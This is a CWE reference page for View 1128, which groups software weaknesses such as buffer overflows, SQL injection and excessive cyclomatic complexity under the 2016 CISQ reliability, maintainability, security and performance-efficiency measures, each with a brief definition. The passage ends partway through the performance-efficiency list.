CWE - VIEW SLICE: CWE-1128: CISQ Quality Measures (2016) (4.19.1)

CWE VIEW: CISQ Quality Measures (2016)

View ID: 1128

Vulnerability Mapping: PROHIBITED This CWE ID must not be used to map to real-world vulnerabilities
Type: Graph

Downloads: Booklet | CSV | XML

Objective

This view outlines the most important software quality issues as identified by the Consortium for Information & Software Quality (CISQ) Automated Quality Characteristic Measures, released in 2016. These measures are derived from Object Management Group (OMG) standards.

Audience

Stakeholder	Description
Software Developers	This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process.
Product Vendors	This view can help product vendors understand code quality issues and convey an overall status of their software.
Assessment Tool Vendors	This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern.

Relationships

div.collapseblock { display:inline }

The following graph shows the tree-like relationships between weaknesses that exist at different levels of abstraction. At the highest level, categories and pillars exist to group weaknesses. Categories (which are not technically weaknesses) are special CWE entries used to group weaknesses that share a common characteristic. Pillars are weaknesses that are described in the most abstract fashion. Below these top-level entries are weaknesses are varying levels of abstraction. Classes are still very abstract, typically independent of any specific language or technology. Base level weaknesses are used to present a more specific type of weakness. A variant is a weakness that is described at a very low level of detail, typically limited to a specific language or technology. A chain is a set of weaknesses that must be reachable consecutively in order to produce an exploitable vulnerability. While a composite is a set of weaknesses that must all be present simultaneously in order to produce an exploitable vulnerability.

Show Details:

Expand All | Collapse All

1128 - CISQ Quality Measures (2016)

Category - a CWE entry that contains a set of other entries that share a common characteristic. CISQ Quality Measures (2016) - Reliability - (1129)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability)

Weaknesses in this category are related to the CISQ Quality Measures for Reliability, as documented in 2016 with the Automated Source Code CISQ Reliability Measure (ASCRM) Specification 1.0. Presence of these weaknesses could reduce the reliability of the software.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') - (120)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))

The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer. Classic Buffer Overflow Unbounded Transfer

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 252 (Unchecked Return Value)

The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 396 (Declaration of Catch for Generic Exception)

Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Declaration of Throws for Generic Exception - (397)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 397 (Declaration of Throws for Generic Exception)

The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.

Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource. Missing Initialization of a Variable - (456)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 456 (Missing Initialization of a Variable)

The product does not initialize critical variables, which causes the execution environment to use unexpected values.

Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource. Uncontrolled Recursion - (674)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 674 (Uncontrolled Recursion)

The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack. Stack Exhaustion

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 704 (Incorrect Type Conversion or Cast)

The product does not correctly convert an object, resource, or structure from one type to a different type.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Missing Release of Resource after Effective Lifetime - (772)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 772 (Missing Release of Resource after Effective Lifetime)

The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Access of Memory Location After End of Buffer - (788)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 788 (Access of Memory Location After End of Buffer)

The product reads or writes to a buffer using an index or pointer that references a memory location after the end of the buffer.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor - (1045)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1045 (Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor)

A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1047 (Modules with Circular Dependencies)

The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Initialization with Hard-Coded Network Resource Configuration Data - (1051)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1051 (Initialization with Hard-Coded Network Resource Configuration Data)

The product initializes data using hard-coded values that act as network resource identifiers.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element with Variadic Parameters - (1056)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1056 (Invokable Control Element with Variadic Parameters)

A named-callable or method control element has a signature that supports a variable (variadic) number of parameters or arguments.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element - (1058)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1058 (Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element)

The code contains a function or method that operates in a multi-threaded environment but owns an unsafe non-final static storable or member data element.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Parent Class with References to Child Class - (1062)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1062 (Parent Class with References to Child Class)

The code has a parent class that contains references to a child class, its methods, or its members.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Runtime Resource Management Control Element in a Component Built to Run on Application Servers - (1065)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1065 (Runtime Resource Management Control Element in a Component Built to Run on Application Servers)

The product uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1066 (Missing Serialization Control Element)

The product contains a serializable data element that does not have an associated serialization method.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1069 (Empty Exception Block)

An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Serializable Data Element Containing non-Serializable Item Elements - (1070)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1070 (Serializable Data Element Containing non-Serializable Item Elements)

The product contains a serializable, storable data element such as a field or member, but the data element contains member elements that are not serializable.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1077 (Floating Point Comparison with Incorrect Operator)

The code performs a comparison such as an equality test between two float (floating point) values, but it uses comparison operators that do not account for the possibility of loss of precision.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Parent Class without Virtual Destructor Method - (1079)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1079 (Parent Class without Virtual Destructor Method)

A parent class contains one or more child classes, but the parent class does not have a virtual destructor method.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Class Instance Self Destruction Control Element - (1082)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1082 (Class Instance Self Destruction Control Element)

The code contains a class instance that calls the method or function to delete or destroy itself.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Data Access from Outside Expected Data Manager Component - (1083)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1083 (Data Access from Outside Expected Data Manager Component)

The product is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Class with Virtual Method without a Virtual Destructor - (1087)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1087 (Class with Virtual Method without a Virtual Destructor)

A class contains a virtual method, but the method does not have an associated virtual destructor.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Synchronous Access of Remote Resource without Timeout - (1088)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1088 (Synchronous Access of Remote Resource without Timeout)

The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Persistent Storable Data Element without Associated Comparison Control Element - (1097)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1097 (Persistent Storable Data Element without Associated Comparison Control Element)

The product uses a storable data element that does not have all of the associated functions or methods that are necessary to support comparison.

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1096 (Singleton Class Instance Creation without Proper Locking or Synchronization)

The product implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Data Element containing Pointer Item without Proper Copy Control Element - (1098)

1128 (CISQ Quality Measures (2016)) > 1129 (CISQ Quality Measures (2016) - Reliability) > 1098 (Data Element containing Pointer Item without Proper Copy Control Element)

The code contains a data element with a pointer that does not have an associated copy or constructor method.

Category - a CWE entry that contains a set of other entries that share a common characteristic. CISQ Quality Measures (2016) - Maintainability - (1130)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability)

Weaknesses in this category are related to the CISQ Quality Measures for Maintainability, as documented in 2016 with the Automated Source Code Maintainability Measure (ASCMM) Specification 1.0. Presence of these weaknesses could reduce the maintainability of the software.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 561 (Dead Code)

The product contains dead code, which can never be executed.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1041 (Use of Redundant Code)

The product has multiple functions, methods, procedures, macros, etc. that contain the same code.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Architecture with Number of Horizontal Layers Outside of Expected Range - (1044)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1044 (Architecture with Number of Horizontal Layers Outside of Expected Range)

The product's architecture contains too many - or too few - horizontal layers.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1047 (Modules with Circular Dependencies)

The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element with Large Number of Outward Calls - (1048)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1048 (Invokable Control Element with Large Number of Outward Calls)

The code contains callable control elements that contain an excessively large number of references to other application objects external to the context of the callable, i.e. a Fan-Out value that is excessively large.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Excessive Use of Hard-Coded Literals in Initialization - (1052)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1052 (Excessive Use of Hard-Coded Literals in Initialization)

The product initializes a data element using a hard-coded literal that is not a simple integer or static constant element.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer - (1054)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1054 (Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer)

The code at one architectural layer invokes code that resides at a deeper layer than the adjacent layer, i.e., the invocation skips at least one layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Multiple Inheritance from Concrete Classes - (1055)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1055 (Multiple Inheritance from Concrete Classes)

The product contains a class with inheritance from more than one concrete class.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element with Signature Containing an Excessive Number of Parameters - (1064)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1064 (Invokable Control Element with Signature Containing an Excessive Number of Parameters)

The product contains a function, subroutine, or method whose signature has an unnecessarily large number of parameters/arguments.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1074 (Class with Excessively Deep Inheritance)

A class has an inheritance level that is too high, i.e., it has a large number of parent classes.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Unconditional Control Flow Transfer outside of Switch Block - (1075)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1075 (Unconditional Control Flow Transfer outside of Switch Block)

The product performs unconditional control transfer (such as a "goto") in code outside of a branching structure such as a switch block.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Source Code File with Excessive Number of Lines of Code - (1080)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1080 (Source Code File with Excessive Number of Lines of Code)

A source code file has too many lines of code.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 766 (Critical Data Element Declared Public)

The product declares a critical variable, field, or member to be public when intended security policy requires it to be private.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element with Excessive File or Data Access Operations - (1084)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1084 (Invokable Control Element with Excessive File or Data Access Operations)

A function or method contains too many operations that utilize a data manager or file resource.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Invokable Control Element with Excessive Volume of Commented-out Code - (1085)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1085 (Invokable Control Element with Excessive Volume of Commented-out Code)

A function, method, procedure, etc. contains an excessive amount of code that has been commented out within its body.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Class with Excessive Number of Child Classes - (1086)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1086 (Class with Excessive Number of Child Classes)

A class contains an unnecessarily large number of children.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Method Containing Access of a Member Element from Another Class - (1090)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1090 (Method Containing Access of a Member Element from Another Class)

A method for a class performs an operation that directly accesses a member element from another class.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Use of Same Invokable Control Element in Multiple Architectural Layers - (1092)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1092 (Use of Same Invokable Control Element in Multiple Architectural Layers)

The product uses the same control element across multiple architectural layers.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Loop Condition Value Update within the Loop - (1095)

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1095 (Loop Condition Value Update within the Loop)

The product uses a loop with a control flow condition based on a value that is updated within the body of the loop.

1128 (CISQ Quality Measures (2016)) > 1130 (CISQ Quality Measures (2016) - Maintainability) > 1121 (Excessive McCabe Cyclomatic Complexity)

The code contains McCabe cyclomatic complexity that exceeds a desirable maximum.

Category - a CWE entry that contains a set of other entries that share a common characteristic. CISQ Quality Measures (2016) - Security - (1131)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security)

Weaknesses in this category are related to the CISQ Quality Measures for Security, as documented in 2016 with the Automated Source Code Security Measure (ASCSM) Specification 1.0. Presence of these weaknesses could reduce the security of the software.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - (22)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 22 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Directory traversal Path traversal

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - (78)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. Shell injection Shell metacharacters OS Command Injection

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - (79)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. XSS HTML Injection Reflected XSS / Non-Persistent XSS / Type 1 XSS Stored XSS / Persistent XSS / Type 2 XSS DOM-Based XSS / Type 0 XSS CSS

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - (89)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. SQL injection SQLi

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 99 (Improper Control of Resource Identifiers ('Resource Injection'))

The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. Insecure Direct Object Reference

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))

The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer. Classic Buffer Overflow Unbounded Transfer

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 129 (Improper Validation of Array Index)

The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array. out-of-bounds array index index-out-of-range array index underflow

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 134 (Use of Externally-Controlled Format String)

The product uses a function that accepts a format string as an argument, but the format string originates from an external source.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 252 (Unchecked Return Value)

The product does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 327 (Use of a Broken or Risky Cryptographic Algorithm)

The product uses a broken or risky cryptographic algorithm or protocol.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 396 (Declaration of Catch for Generic Exception)

Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Declaration of Throws for Generic Exception - (397)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 397 (Declaration of Throws for Generic Exception)

The product throws or raises an overly broad exceptions that can hide important details and produce inappropriate responses to certain conditions.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Unrestricted Upload of File with Dangerous Type - (434)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 434 (Unrestricted Upload of File with Dangerous Type)

The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. Unrestricted File Upload

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 456 (Missing Initialization of a Variable)

The product does not initialize critical variables, which causes the execution environment to use unexpected values.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 606 (Unchecked Input for Loop Condition)

The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 667 (Improper Locking)

The product does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 672 (Operation on a Resource after Expiration or Release)

The product uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 681 (Incorrect Conversion between Numeric Types)

When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Missing Release of Resource after Effective Lifetime - (772)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 772 (Missing Release of Resource after Effective Lifetime)

The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 789 (Memory Allocation with Excessive Size Value)

The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated. Stack Exhaustion

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 798 (Use of Hard-coded Credentials)

The product contains hard-coded credentials, such as a password or cryptographic key.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Loop with Unreachable Exit Condition ('Infinite Loop') - (835)

1128 (CISQ Quality Measures (2016)) > 1131 (CISQ Quality Measures (2016) - Security) > 835 (Loop with Unreachable Exit Condition ('Infinite Loop'))

The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.

Category - a CWE entry that contains a set of other entries that share a common characteristic. CISQ Quality Measures (2016) - Performance Efficiency - (1132)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency)

Weaknesses in this category are related to the CISQ Quality Measures for Performance Efficiency, as documented in 2016 with the Automated Source Code Performance Efficiency Measure (ASCPEM) Specification 1.0. Presence of these weaknesses could reduce the performance efficiency of the software.

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1042 (Static Member Data Element outside of a Singleton Class Element)

The code contains a member element that is declared as static (but not final), in which its parent class element is not a singleton class - that is, a class element that can be used only once in the 'to' association of a Create action.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Data Element Aggregating an Excessively Large Number of Non-Primitive Elements - (1043)

1128 (CISQ Quality Measures (2016)) > 1132 (CISQ Quality Measures (2016) - Performance Efficiency) > 1043 (Data Element Aggregating an Excessively Large Number of Non-Primitive Elements)

The product uses a data element that has an excessively large number of sub-elements with non-primitive data types such as structures or aggregated objects.

Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. Creation of Immutable Text Using String Concatenation - (1046)

